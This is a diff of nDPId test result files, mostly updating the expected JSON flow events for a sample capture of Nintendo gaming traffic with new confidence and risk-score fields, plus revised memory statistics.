+00647{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1500731329336,"flow_last_seen":1500731329520,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"54.146.242.74","src_port":11534,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}}
 00575{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1500731329336,"flow_last_seen":1500731329520,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"54.146.242.74","src_port":11534,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00660{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":54,"flow_first_seen":1500731322454,"flow_last_seen":1500731343995,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":917,"flow_tot_l4_payload_len":4923,"flow_avg_l4_payload_len":91,"midstream":1,"ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"54.187.10.185","dst_ip":"192.168.12.114","src_port":443,"dst_port":48328,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}}
-00653{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":160,"flow_first_seen":1500731343266,"flow_last_seen":1500731348756,"flow_idle_time":180000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":844,"flow_tot_l4_payload_len":45024,"flow_avg_l4_payload_len":281,"midstream":0,"ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"81.61.158.138","src_port":55915,"dst_port":51769,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Nintendo","breed":"Fun","category":"Game"}}
-00648{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1500731326599,"flow_last_seen":1500731326628,"flow_idle_time":180000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":153,"midstream":0,"ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"192.168.12.1","src_port":18874,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Nintendo","breed":"Fun","category":"Game"}}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1500731340826,"flow_last_seen":1500731340827,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"35.158.74.61","src_port":55915,"dst_port":33334,"l4_proto":"udp","ndpi": {"proto":"AmazonAWS","breed":"Acceptable","category":"Cloud"}}
+00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":54,"flow_first_seen":1500731322454,"flow_last_seen":1500731343995,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":917,"flow_tot_l4_payload_len":4923,"flow_avg_l4_payload_len":91,"midstream":1,"ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"54.187.10.185","dst_ip":"192.168.12.114","src_port":443,"dst_port":48328,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}}
+00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":160,"flow_first_seen":1500731343266,"flow_last_seen":1500731348756,"flow_idle_time":180000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":844,"flow_tot_l4_payload_len":45024,"flow_avg_l4_payload_len":281,"midstream":0,"ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"81.61.158.138","src_port":55915,"dst_port":51769,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Nintendo","breed":"Fun","category":"Game"}}
+00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1500731326599,"flow_last_seen":1500731326628,"flow_idle_time":180000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":153,"midstream":0,"ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"192.168.12.1","src_port":18874,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Nintendo","breed":"Fun","category":"Game"}}
+00648{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1500731340826,"flow_last_seen":1500731340827,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"35.158.74.61","src_port":55915,"dst_port":33334,"l4_proto":"udp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"AmazonAWS","breed":"Acceptable","category":"Cloud"}}
 00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1500731340826,"flow_last_seen":1500731340827,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"35.158.74.61","src_port":55915,"dst_port":33334,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00615{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1500731340941,"flow_last_seen":1500731340946,"flow_idle_time":180000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":64,"midstream":0,"ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"35.158.74.61","src_port":55915,"dst_port":33335,"l4_proto":"udp","ndpi": {"proto":"AmazonAWS","breed":"Acceptable","category":"Cloud"}}
+00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1500731340941,"flow_last_seen":1500731340946,"flow_idle_time":180000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":64,"midstream":0,"ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"35.158.74.61","src_port":55915,"dst_port":33335,"l4_proto":"udp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"AmazonAWS","breed":"Acceptable","category":"Cloud"}}
 00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1500731340941,"flow_last_seen":1500731340946,"flow_idle_time":180000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":64,"midstream":0,"ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"35.158.74.61","src_port":55915,"dst_port":33335,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00619{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731340981,"flow_last_seen":1500731340981,"flow_idle_time":180000,"flow_min_l4_payload_len":256,"flow_max_l4_payload_len":256,"flow_tot_l4_payload_len":256,"flow_avg_l4_payload_len":256,"midstream":0,"ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"52.10.205.177","src_port":55915,"dst_port":34343,"l4_proto":"udp","ndpi": {"proto":"AmazonAWS","breed":"Acceptable","category":"Cloud"}}
+00653{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731340981,"flow_last_seen":1500731340981,"flow_idle_time":180000,"flow_min_l4_payload_len":256,"flow_max_l4_payload_len":256,"flow_tot_l4_payload_len":256,"flow_avg_l4_payload_len":256,"midstream":0,"ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"52.10.205.177","src_port":55915,"dst_port":34343,"l4_proto":"udp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"AmazonAWS","breed":"Acceptable","category":"Cloud"}}
 00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731340981,"flow_last_seen":1500731340981,"flow_idle_time":180000,"flow_min_l4_payload_len":256,"flow_max_l4_payload_len":256,"flow_tot_l4_payload_len":256,"flow_avg_l4_payload_len":256,"midstream":0,"ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"52.10.205.177","src_port":55915,"dst_port":34343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00655{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":157,"flow_first_seen":1500731343061,"flow_last_seen":1500731348745,"flow_idle_time":180000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":1212,"flow_tot_l4_payload_len":46764,"flow_avg_l4_payload_len":297,"midstream":0,"ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"93.237.131.235","src_port":55915,"dst_port":56066,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Nintendo","breed":"Fun","category":"Game"}}
-00662{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1500731323269,"flow_last_seen":1500731323270,"flow_idle_time":180000,"flow_min_l4_payload_len":76,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":228,"flow_avg_l4_payload_len":76,"midstream":0,"ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"35.158.74.61","src_port":52119,"dst_port":33335,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Nintendo.AmazonAWS","breed":"Acceptable","category":"Game"}}
-00618{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731326270,"flow_last_seen":1500731326270,"flow_idle_time":180000,"flow_min_l4_payload_len":688,"flow_max_l4_payload_len":688,"flow_tot_l4_payload_len":688,"flow_avg_l4_payload_len":688,"midstream":0,"ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"52.10.205.177","src_port":52119,"dst_port":34343,"l4_proto":"udp","ndpi": {"proto":"AmazonAWS","breed":"Acceptable","category":"Cloud"}}
+00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":157,"flow_first_seen":1500731343061,"flow_last_seen":1500731348745,"flow_idle_time":180000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":1212,"flow_tot_l4_payload_len":46764,"flow_avg_l4_payload_len":297,"midstream":0,"ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"93.237.131.235","src_port":55915,"dst_port":56066,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Nintendo","breed":"Fun","category":"Game"}}
+00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1500731323269,"flow_last_seen":1500731323270,"flow_idle_time":180000,"flow_min_l4_payload_len":76,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":228,"flow_avg_l4_payload_len":76,"midstream":0,"ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"35.158.74.61","src_port":52119,"dst_port":33335,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Nintendo","breed":"Fun","category":"Game"}}
+00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731326270,"flow_last_seen":1500731326270,"flow_idle_time":180000,"flow_min_l4_payload_len":688,"flow_max_l4_payload_len":688,"flow_tot_l4_payload_len":688,"flow_avg_l4_payload_len":688,"midstream":0,"ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"52.10.205.177","src_port":52119,"dst_port":34343,"l4_proto":"udp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"AmazonAWS","breed":"Acceptable","category":"Cloud"}}
 00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731326270,"flow_last_seen":1500731326270,"flow_idle_time":180000,"flow_min_l4_payload_len":688,"flow_max_l4_payload_len":688,"flow_tot_l4_payload_len":688,"flow_avg_l4_payload_len":688,"midstream":0,"ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"52.10.205.177","src_port":52119,"dst_port":34343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00708{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1500731326644,"flow_last_seen":1500731327201,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1348,"flow_tot_l4_payload_len":6361,"flow_avg_l4_payload_len":302,"midstream":0,"ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"54.192.27.217","src_port":41517,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Nintendo","breed":"Fun","category":"Game"}}
-00707{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1500731341201,"flow_last_seen":1500731341710,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1348,"flow_tot_l4_payload_len":6363,"flow_avg_l4_payload_len":318,"midstream":0,"ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"54.192.27.8","src_port":31329,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Nintendo","breed":"Fun","category":"Game"}}
-00655{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":447,"flow_first_seen":1500731342849,"flow_last_seen":1500731348749,"flow_idle_time":180000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":844,"flow_tot_l4_payload_len":168900,"flow_avg_l4_payload_len":377,"midstream":0,"ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"185.118.169.65","src_port":55915,"dst_port":27520,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Nintendo","breed":"Fun","category":"Game"}}
-00648{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":39,"flow_first_seen":1500731320644,"flow_last_seen":1500731325506,"flow_idle_time":180000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":812,"flow_tot_l4_payload_len":4452,"flow_avg_l4_payload_len":114,"midstream":0,"ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"91.8.243.35","src_port":52119,"dst_port":49432,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Nintendo","breed":"Fun","category":"Game"}}
-00649{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1500731320774,"flow_last_seen":1500731322059,"flow_idle_time":180000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":1376,"flow_avg_l4_payload_len":86,"midstream":0,"ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"109.21.255.11","src_port":52119,"dst_port":50251,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Nintendo","breed":"Fun","category":"Game"}}
-00648{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1500731320764,"flow_last_seen":1500731321914,"flow_idle_time":180000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":1332,"flow_avg_l4_payload_len":88,"midstream":0,"ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"134.3.248.25","src_port":52119,"dst_port":56955,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Nintendo","breed":"Fun","category":"Game"}}
-00619{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1500731343274,"flow_last_seen":1500731343874,"flow_idle_time":120000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"151.6.184.98","dst_ip":"192.168.12.114","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"ICMP","breed":"Acceptable","category":"Network"}}
-00621{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1500731342860,"flow_last_seen":1500731343591,"flow_idle_time":120000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":756,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"151.6.184.100","dst_ip":"192.168.12.114","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"ICMP","breed":"Acceptable","category":"Network"}}
+00814{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1500731326644,"flow_last_seen":1500731327201,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1348,"flow_tot_l4_payload_len":6361,"flow_avg_l4_payload_len":302,"midstream":0,"ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"54.192.27.217","src_port":41517,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Nintendo","breed":"Fun","category":"Game"}}
+00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1500731341201,"flow_last_seen":1500731341710,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1348,"flow_tot_l4_payload_len":6363,"flow_avg_l4_payload_len":318,"midstream":0,"ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"54.192.27.8","src_port":31329,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Nintendo","breed":"Fun","category":"Game"}}
+00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":447,"flow_first_seen":1500731342849,"flow_last_seen":1500731348749,"flow_idle_time":180000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":844,"flow_tot_l4_payload_len":168900,"flow_avg_l4_payload_len":377,"midstream":0,"ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"185.118.169.65","src_port":55915,"dst_port":27520,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Nintendo","breed":"Fun","category":"Game"}}
+00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":39,"flow_first_seen":1500731320644,"flow_last_seen":1500731325506,"flow_idle_time":180000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":812,"flow_tot_l4_payload_len":4452,"flow_avg_l4_payload_len":114,"midstream":0,"ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"91.8.243.35","src_port":52119,"dst_port":49432,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Nintendo","breed":"Fun","category":"Game"}}
+00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1500731320774,"flow_last_seen":1500731322059,"flow_idle_time":180000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":1376,"flow_avg_l4_payload_len":86,"midstream":0,"ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"109.21.255.11","src_port":52119,"dst_port":50251,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Nintendo","breed":"Fun","category":"Game"}}
+00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1500731320764,"flow_last_seen":1500731321914,"flow_idle_time":180000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":1332,"flow_avg_l4_payload_len":88,"midstream":0,"ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"134.3.248.25","src_port":52119,"dst_port":56955,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Nintendo","breed":"Fun","category":"Game"}}
+00645{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1500731343274,"flow_last_seen":1500731343874,"flow_idle_time":120000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"151.6.184.98","dst_ip":"192.168.12.114","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}}
+00647{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1500731342860,"flow_last_seen":1500731343591,"flow_idle_time":120000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":756,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"151.6.184.100","dst_ip":"192.168.12.114","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}}
 00160{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","total-events-serialized":131}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 1000/996
@@ -137,9 +137,9 @@
 ~~ total active/idle flows...: 21/21
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4659553 bytes
-~~ total memory freed........: 4659553 bytes
-~~ total allocations/frees...: 100622/100622
+~~ total memory allocated....: 4737946 bytes
+~~ total memory freed........: 4737946 bytes
+~~ total allocations/frees...: 102212/102212
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 165 chars
 ~~ json string max len.......: 1392 chars
diff --git a/test/results/no_sni.pcap.out b/test/results/no_sni.pcap.out
index f7c541b03..357eb5eb6 100644
--- a/test/results/no_sni.pcap.out
+++ b/test/results/no_sni.pcap.out
@@ -7,14 +7,14 @@
 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1604822444486,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1604822444486,"pkt":"EBMxuRBeeDHBvV4kCABFAABAAABAAEAGFo\/AqAF3aBD5+cmWAbsdU0ZpAAAAALAC\/\/\/IBQAAAgQFtAEDAwYBAQgKKlLxbAAAAAAEAgAA"}
